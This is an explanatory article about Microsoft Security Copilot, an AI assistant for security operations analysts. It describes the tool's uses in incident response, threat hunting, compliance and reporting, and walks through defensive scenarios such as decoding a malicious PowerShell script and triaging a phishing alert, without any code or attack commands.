Microsoft Security Copilot is an all-in-one virtual assistant that uses the power of AI to augment your workflow.
You have likely noticed an AI takeover has been happening in 2023, and the cyber security industry is not immune. Security Copilot is a new cloud-based service AI tool to help you enhance the security of your Microsoft cloud environment.
Will this new offering revolutionize cyber security as we know it today?
This comprehensive Microsoft Security Copilot guide answers this question and how to harness this new AI tool. It uses practical examples to explore how Security Copilot intends to shake up traditional approaches across various cyber security fields. Then you can judge how it stacks up against current offerings.
Let’s discover how we can use Security Copilot and the power of AI!
What Is Microsoft Security Copilot?
Security Copilot Augments a Security Analyst's Workflow
Security Copilot combines the power of OpenAI's GPT-4 generative AI advanced large language model (LLM) with a security specific model developed by Microsoft. This allows a Security Operations Centre (SOC) analyst to prompt Security Copilot like you would prompt ChatGPT. You ask a question, and the tool returns an AI-generated response that answers the security related inquiry.
“Microsoft Security Copilot is an AI-powered security analysis tool that enables analysts to respond to threats quickly, process signals at machine speed, and assess risk exposure in minutes.” - Microsoft
Security Copilot Has Been Created for SOC Analysts
SOC analysts are the skilled security professionals responsible for monitoring, detecting, and responding to cyber security incidents and threats. They continuously monitor an organization's network, systems, and applications to identify malicious activity and use various security tools and technologies.
Security Copilot Is Another Tool for You to Add to Your Arsenal
Microsoft claims Security Copilot allows you to augment your workflow by leveraging the power of AI in a cyber security-specific context. The tool can be applied to a broad range of key activities and responsibilities the SOC performs, from monitoring and detection to compliance and vulnerability management.
Microsoft claims Security Copilot can do the following:
How Can You Get Your Hands on Microsoft Security Copilot?
Security Coilot is currently in preview and available only for select customers. You can sign up for Microsoft’s Security updates to hear about product announcements. However, at this time, there is no public release date.
How Can Microsoft Security Copilot be Used?
The power of Microsoft Security Copilot can extend across a broad spectrum of cyber security fields, from reporting to compliance monitoring. You can use the tool to help augment your workflow in any of the following disciplines:
You can use Security Copilot when responding to incidents through a variety of actions:
- Incident triage and assessment: Security Copilot can quickly evaluate an incident and guide your initial response steps.
- Incident containment and mitigation: Security Copilot’s view into your entire cloud environment provides insight into how to contain a security incident and mitigate any further damage. For instance, what systems to isolate, what temporary security measures or controls to implement, and what patches must be deployed immediately.
- Forensic analysis and investigation: Security Copilot can quickly analyze malicious files or commands and identify Indicators of Compromise (IOCs) that you can search for in your environment to identify affected machines.
- Remediation and recovery: Security Copilot can assist in developing a remediation plan to restore affected systems and apply necessary security controls and patches to ensure the incident does not reoccur.
Without AI, these use cases would consume valuable person-hours, resulting in a less efficient response. Augmenting response with Security Copilot helps you find answers faster and limit the potential damage an ongoing attack could cause.
Security Copilot can use Microsoft’s global threat intelligence feed that ingests 65 trillion signals daily and includes the latest cyber threats affecting organizations worldwide. Security Copilot can use this feed, and other third-party intelligence feeds, to automatically identify IOCs in your environment and provide context to security alerts or aid in incident investigation.
Aside from IOCs, Security Copilot can provide analysis and reporting services to help you visualize the threat intelligence your organization is ingesting. The tool can analyze the intelligence, identify relevant patterns, and provide actionable insights to mitigate potential risks.
Threat hunting always starts with developing a hypothesis that states what the hunt will search for in your environment. According to Microsoft, Security Copilot can assist with creating a hunting hypothesis by providing security insights on the proven tactics/techniques/procedures (TTPs) threat actors are using and identifying potential threat scenarios.
You can then use these security insights to craft a custom hunting query with the help of Security Copilot and its integration with Microsoft’s Advanced Hunting feature in Defender for Endpoint and Sentinel. These queries can carry out your threat hunt by searching attack data, such as known IOCs, suspicious activities, or patterns associated with emerging cyber threats.
Many businesses must comply with industry standards to protect corporate data and meet regulatory requirements. To manually audit your organization and ensure each condition is satisfied can be tedious. Microsoft claims Security Copilot can assist with this in several ways:
- Compliance policy assessment: Security Copilot can help you assess your organization’s compliance with industry standards, regulatory requirements, and internal policies by evaluating the security controls across your environment.
- Automated compliance reporting and dashboards: Instead of manually creating reports or dashboards to monitor your compliance, Security Copilot can automatically generate these dashboards for you. This helps you easily track your progress toward compliance goals and demonstrate this to auditors.
- Compliance audits and remediation guidance: Security Copilot can perform comprehensive compliance audits at machine speed. Suppose you need to improve a particular area. The tool can generate remediation steps to get you up to regulatory standards. This can save you time from manual auditing and finding remediation guidance from auditors.
- Continuous monitoring of regulatory updates: As standards are updated and governing bodies change their regulatory requirements, you must stay informed and vigilant in ensuring your IT environment is compliant. Security Copilot can automatically keep you up-to-date with regulatory changes and guide how these changes may impact your compliance requirements.
Other Articles You Might Like
Managing vulnerabilities is a never-ending battle, with new ones emerging daily. This can get overwhelming in large IT environments that deploy various software. According to Microsoft, Security Copilot can help you stay on top of this task with its visibility of your entire cloud environment.
Security Copilot can pull real-time security data from all your endpoint devices and servers to determine software versions and match this against known vulnerabilities gathered from threat intelligence feeds. If an endpoint or server is vulnerable, it can generate remediation steps for you to mitigate associate risks or even be configured to update the vulnerable software automatically.
This capability of automatically alerting you to vulnerabilities in your environment is nothing new. Microsoft Defender for Endpoint already does this. However, using AI to generate remediation steps, automatically perform complex risk mitigation activities, or patch software without user interaction are new capabilities that significantly speed up managing vulnerabilities and improving your organization’s security.
Microsoft Security Copilot is designed to learn from past incidents to generate more accurate responses in the future. Learning is done through user feedback and the analysis of big data. This means that the detections it implements will be less noisy (reduced false positives), and you will be able to focus on real incidents that require your attention. The longer Security Copilot runs, the smarter it gets.
You can also use Security Copilot to generate detection rules for you. For instance, you can ask it to create a detection that triggers when a specific new vulnerability is exploited. This saves you the time and effort of manually researching the vulnerability and writing the rule, ensuring your environment is protected much faster.
Microsoft Security Copilot in Practice
Let’s look at Security Copilot in action by reviewing common real world security incidents you will likely encounter when working in a SOC.
Scenario 1 - Reverse engineering a Malicious Payload
Adversaries often use malicious payloads within PowerShell scripts to attack machines in your environment. As a SOC analyst, you will encounter a malicious payload in a PowerShell script that you must decode to find IOCs to hunt for in your environment.
Without Security Copilot
This requires you to work through the script line-by-line and use third-party tools to decode and deobfuscate the PowerShell code to find IOCs to hunt for. A tedious process that can be time-consuming that requires in-depth knowledge of PowerShell.
Using Security Copilot
Security Copilot can automatically decode the script and extract the relevant IOCs for you to hunt for. You only need to copy and paste the script into the prompt, and the tool will do the rest of the work for you. This saves you time and lowers the bar regarding the required knowledge.
Microsoft showcased the capabilities of Security Copilot in a live demonstration where it was used to reverse engineer a malicious payload. Check out the demo below to see Copilot in action.
Scenario 2 - Incident Response
Responding to incidents needs to be efficient. To do this, you must perform initial triage on alerts to determine which ones you must prioritize and respond to. As a SOC analyst, you will often see an alert you need to summarize to prioritize (or deprioritize) the alert quickly.
Without Security Copilot
This process requires navigating to the alert using your organization's security solution (e.g., in the SIEM). Then you would have to try to gather all the relevant security data associated with this alert (e.g., affected systems, processes involved, users involved, the execution tree, etc.). Once you have all this, you need to piece it together to summarize the alert, and only then can you decide the priority of the alert.
Using Security Copilot
Security Copilot can quickly analyze an alert and provide a summary of an alert’s relevant details:
Security Copilot can retrieve and analyze an alert through its integration with Microsoft Sentinel (a SIEM). This alert was raised in Sentinel and is related to “OneNote initial access,” likely a phishing email that has used a malicious OneNote attachment or link. The tool can use its AI model to summarize what happened and highlight key details. It also generates a graphical view of the incident.
You can quickly read over this summary and use the graph to understand this alert. Then you can use your domain knowledge to determine the priority of this alert. Security Copilot provides useful suggestions about potential next steps if you choose to investigate further. In this incident, you can investigate the malicious file's impact on the affected system or pivot to Sentinel (Microsoft’s SIEM solution) and get a general incident analysis.
This quick analysis allows you to triage alerts more efficiently, and the suggestions provided by Security Copilot, after an initial summary, will enable you to pivot into a full investigation and potential remediation effortlessly.
Scenario 3 - Threat Hunting
Threat hunting is a key part of any SOC. When you come across an IOC from a threat intelligence feed, you must search for it in your environment to determine if other systems have been affected.
Without Security Copilot
To perform a threat hunt using an IOC, you first need to find the IOC from a threat intelligence feed. Then you need to craft a query to search for the IOC in your environment. If you use a Microsoft tool, this would be done using an Advanced Hunting query, requiring in-depth knowledge of KQL (Microsoft’s query language for its security products).
Researching the query to write and then writing the query would require time and effort, potentially giving the attacker time to spread in your environment and compromise other machines. This time is compounded if you need to perform multiple threat hunts.
Using Security Copilot
Security Copilot allows you to summarize an alert and extract relevant IOCs quickly. You pivot from a summary of an alert into a threat hunt by asking Security Copilot if an IOC has been seen anywhere else in your environment. For example, has a certain file been seen anywhere else in your environment:
Here Security Copilot has identified that a file was sent in an email from one user to another in your environment. You can then perform another threat hunt from within Security Copilot to investigate if this email has gone to other users in your environment, as they may also be compromised. This is done by selecting “Email: Look for presence”:
The suggestion provided by Security Copilot lets you scan for emails that contain the compromised file and see who sent/received the file to find out if more users have been affected. It also initiates a threat hunt to investigate if there have been any suspicious logins related to the user who sent the email. This helps in determining if their account has been compromised.
Here you see the email chain with the potentially compromised user sending the email with the malicious link to two other users in the organization:
You discover that there have indeed been suspicious login attempts for the potentially compromised account that sent the malicious link. This confirms your suspicion that the account has been compromised and concludes your threat hunt:
In this scenario, Security Copilot could seamlessly perform multiple threat hunts from an initial alert about a compromised account and device. This integration with Defender for Endpoint allowed you to quickly investigate the alert and discover if other users or devices were affected.
Scenario 4 - Securing Reporting
When working as a SOC analyst, you often need to provide reports on major incidents that you come across. This report must provide a high-level overview of an incident so your manager can use it to identify patterns or trends in the cyber attacks affecting your organization.
Without Security Copilot
Creating such reports can be tedious. You need to investigate an alert, summarize the attack data, and present it in an easily digestible format to your manager (e.g., in a PDF or PowerPoint). This process involves using multiple technologies and copying and pasting data in various locations.
Using Security Copilot
Security Copilot makes security reporting incredibly simple with its integration with Microsoft tools. You can use Security Copilot to provide an analysis of an alert, as we did previously, and then ask it to generate a PowerPoint slide that outlines this analysis:
Once Security Copilot creates this slide, you can add it to your organization’s reporting slide deck and present your findings to your manager:
This transforms security reporting from a tedious process to a painless one. You will appreciate the easy creation, and your manager will appreciate the timeliness of your reports!
Microsoft Security Copilot will revolutionize various SOC tasks, but will it replace SOC analysts working today?
This seems unlikely in the immediate future. Security Copilot helps augment your workflow and accelerates incident investigation. It draws on the power of AI to provide you with various solutions to security problems. Still, its power comes from your prompt, guided by your domain knowledge. To use Security Copilot effectively, you need to know the right questions.
Microsoft admits in its demonstration of Security Copilot that it is still prone to error (in the demonstration, it lists Windows 9 as a legitimate operating system) and that it takes a skilled security analyst with human ingenuity to operate the tool.
That said, skilled security professionals must fill an estimated 3.4 million jobs. Security Copilot will likely fill some of this talent gap. It can augment work and allows businesses to scale their security programs fast with a relatively small team.
Like other cloud technologies, Security Copilot can speed up operations, requires fewer people to set up and maintain systems, and allows businesses to scale easily. This may mean that SOC analysts working today will need to learn new skills to align with Security Copilot like network engineers were required to with the advent of cloud computing.
Microsoft Security Copilot is just the start of the AI revolution for cyber security.
If you would like to learn more about the topics discussed in this article, be sure to check out these resources: